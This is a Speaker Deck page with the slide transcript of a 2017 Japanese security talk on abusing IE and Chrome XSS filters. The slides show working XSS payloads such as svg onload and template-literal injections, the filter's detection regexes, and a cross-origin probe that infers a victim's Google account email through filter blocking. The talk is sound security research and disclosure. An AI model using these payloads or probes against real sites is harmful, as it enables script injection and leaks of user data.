Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSフィルターの使い方/ Shibuya.XSS techtalk #9
Search
Masato Kinugawa
March 31, 2017
Technology
7
3k
XSSフィルターの使い方/ Shibuya.XSS techtalk #9
2017/3/30 に行われた Shibuya.XSS techtalk #9 の発表資料です。
Masato Kinugawa
March 31, 2017
Tweet
Share
More Decks by Masato Kinugawa
See All by Masato Kinugawa
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
masatokinugawa
8
2.7k
バグハンティングのすゝめ / P3NFEST
masatokinugawa
5
1.7k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
masatokinugawa
13
17k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
masatokinugawa
0
18k
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
21
6.6k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
94k
Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)
masatokinugawa
9
24k
バグハンターが見てきたBug Bountyの7年 / LINE Developer Meetup #34 Security Bug Bounty
masatokinugawa
18
12k
5文字で書くJavaScript/ Shibuya.XSS techtalk #10
masatokinugawa
35
20k
Other Decks in Technology
See All in Technology
What if...? 처음부터 다시 LLM 어플리케이션을 개발한다면
huffon
0
1k
可視化プラットフォームGrafanaの基本と活用方法の全て
hamadakoji
0
230
VPoEの視点から見た、ヘンリーがサーバーサイドKotlinを使う理由 / Why Server-side Kotlin 2024
cho0o0
1
420
テストケースの自動生成に生成AIの導入を試みた話と生成AIによる今後の期待
shift_evolve
0
190
20240717_イケコパ代表Copilot_in_Teams会社でこう使ってます
ponponmikankan
2
430
Azure Pipelinesを使用したCICDベースラインアーキテクチャ実践
yuriemori
0
190
データベース研修 DB基礎【MIXI 24新卒技術研修】
mixi_engineers
PRO
0
220
目標設定は好きですか? アジャイルとともに目標と向き合い続ける方法 / Do you like target Management?
kakehashi
10
3k
データ分析を支える技術 生成AI再入門
ishikawa_satoru
0
380
LINE WORKSへ簡単通知!Incoming Webhookアプリの紹介
mmclsntr
0
110
エンジニアリングマネージャーはどう学んでいくのか #devsumi / How Do Engineering Managers Continue to Learn and Grow?
expajp
4
1.3k
開発と事業を繋ぐ!SREのオブザーバビリティ戦略 ~ Developers Summit 2024 Summer ~
leveragestech
0
640
Featured
See All Featured
XXLCSS - How to scale CSS and keep your sanity
sugarenia
245
1.2M
The Art of Programming - Codeland 2020
erikaheidi
48
13k
Rebuilding a faster, lazier Slack
samanthasiow
78
8.5k
Building Adaptive Systems
keathley
34
2k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
16
1.6k
StorybookのUI Testing Handbookを読んだ
zakiyama
15
4.9k
YesSQL, Process and Tooling at Scale
rocio
166
14k
Making the Leap to Tech Lead
cromwellryan
127
8.7k
Building Applications with DynamoDB
mza
89
5.8k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
78
15k
Art, The Web, and Tiny UX
lynnandtonic
291
20k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
26
1.6k
Transcript
None
None
❶ ➌ ❷ ❹
None
https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg onload=alert(1)>"> </body> </html>
https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg #nload=alert#1#>"> </body> </html>
https://addons.mozilla.org/ja/firefox/addon/noscript/
HTTP/1.1 200 OK Date: Tue, 28 Mar 2017 06:16:00 GMT
Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN
None
None
None
https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701 <input value=""><svg #nload=alert#1#>"> <input value=""><svg onload=alert(1)>">
None
<input value=""><svg #nload=alert#1#>"> <input value="<svg #nload=alert#1#>"> <!-- <svg #nload=alert(1)> -->
https://example.com/?q="><svg+onload=alert(1)>
<input value=""><svg onload=alert(1)>"> <input value="<svg onload=alert(1)>"> <!-- <aaa onload=alert(1)> -->
https://example.com/?q="><svg+onload=alert(1)>
https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701
<title><script> - Google 検索</title> <script>(function(){window.google={kEI: [...] https://www.google.co.jp/search?q=<script>
<script src=//example.jp/jquery.js></script> <script> if(jQuery){ // Expected }else{ // ??? }
</script> https://example.com/?<script src=//example.jp/jquery.js></script>
None
{<a.*?hr{e}f} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}} [...] {(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(&#x?0 *((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53) |(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(&#x?0*((67)|(43)|(99)|(63) );?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&#x?0*((82)|(52)|(114)|(72));?))([\t]| (&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9
|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)| A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).} {<BUTTON[ /+\t].*?va{l}ue[ /+\t]*=} {<fo{r}m.*?>} {<OPTION[ /+\t].*?va{l}ue[ /+\t]*=} {<INPUT[ /+\t].*?va{l}ue[ /+\t]*=} [...] {<EM{B}ED[ /+\t].*?((src)|(type)).*?=} {[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.} {<ME{T}A[ /+\t].*?((http-equiv)|(charset))[ /+\t]*=} [...] "><svg #nload=alert#1#>
[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=. "><svg[SPACE]onload=alert(1)>
"><svg onload=alert(1)> [\"\'][ ]*(([^a-z0- 9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])) )).+?{\(}.*?{\)} x="";alert(1)//"
None
https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU- 2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf http://d.hatena.ne.jp/teracc/20090622
https://www.slideshare.net/masatokinugawa/xxn-ja
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script> q = "";document#body.innerHTML="<xss>"; </script> URL:
?q=";document.body.innerHTML="<xss>
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script src> <script src="//example.co.jp/test.js" type="text/javascript"> </script>
URL: ?"/++.+++=
"style=:\ javascript:- vbscript:- vbs:- ",x[]= "{toString: "{valueOf:
<script src="//example^co.jp/test.js" type="text/javascript"> </script>
window#name//Syntax Error window^name//Syntax OK <script> window.name
None
url=location.search.slice(1); if(url^indexOf(":")!=-1){ url=null; } onload=function(){ if(url){location=url;} }
https://example.com/?q=";alert`1`// <script> q = "";alert`1`//"; </script> https://www.slideshare.net/x00mario/es6-en/34 ECMAScript 6 from
an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else
https://example.com/?q=${alert(1)}``//&`+++` https://example.com/?q=[USER_INPUT] <script> foo=``; q="[USER_INPUT]"; </script> <script> foo=`#; q="${alert(1)}#`//"; </script>
https://example.com/?+onfiles+++=. <script src="/comm#nfiles/js/important.js" type="text/javascript"> </script> [...]
https://bugs.chromium.org/p/chromium/issues/detail?id=654794
None
http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html
https://VICTIM/ https://VICTIM/?<xss> IFRAME ERROR https://ATTACKER/ win=window.open(…) if(win.length == 0){ //
// }else{ // } <script>…</script>
https://www.youtube.com/watch?v=IMDWjKFbsJE
HTTP/1.1 200 OK [...] Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options:
SAMEORIGIN
https://accounts.google.com/ServiceLogin?
google.ae google.as google.ca google.co google.co.in google.co.jp google.co.kr google.co.nz google.co.uk google.com.br
google.com.mx google.de google.es google.fr google.it google.pl google.pt google.ru ...(
✨ ✨ ✨
{<a.*?hr{e}f}
0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref>
5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/
0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref>
5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> <a%XXhref https://example.com/?<a%2Bhref
0 <ahr#f> 1 <aAhr#f> 2 <aAAhr#f> 3 <aAAAhr#f> 4 <aAAAAhr#f>
5 <aAAAAAhr#f> 6 <aAAAAAAhr#f> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/?<a%2Bhref
0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_
A a 0x00 0-9 < B-Z b-z
0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_
A a 0x00 0-9 < B-Z b-z
<div class="gb_xb">
[email protected]
</div><div class="gb_pb"> {[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}
✔ ✔ ✔ ✔
<div class="gb_xb">
[email protected]
</div><div class="gb_pb">
https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
=
https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.ru/?"
[email protected]
=
https://www.google.ru/?"
[email protected]
=
https://www.google.ru/?"
[email protected]
= https://www.google.ru/?"
[email protected]
= https://www.google.ru/?"
[email protected]
= https://www.google.ru/?"
[email protected]
= https://www.google.ru/?"
[email protected]
= https://www.google.ru/?"
[email protected]
= https://www.google.ru/?"
[email protected]
= https://www.google.ca/?"
[email protected]
= ...
✨ ✨ ✨
None
None
None
None
None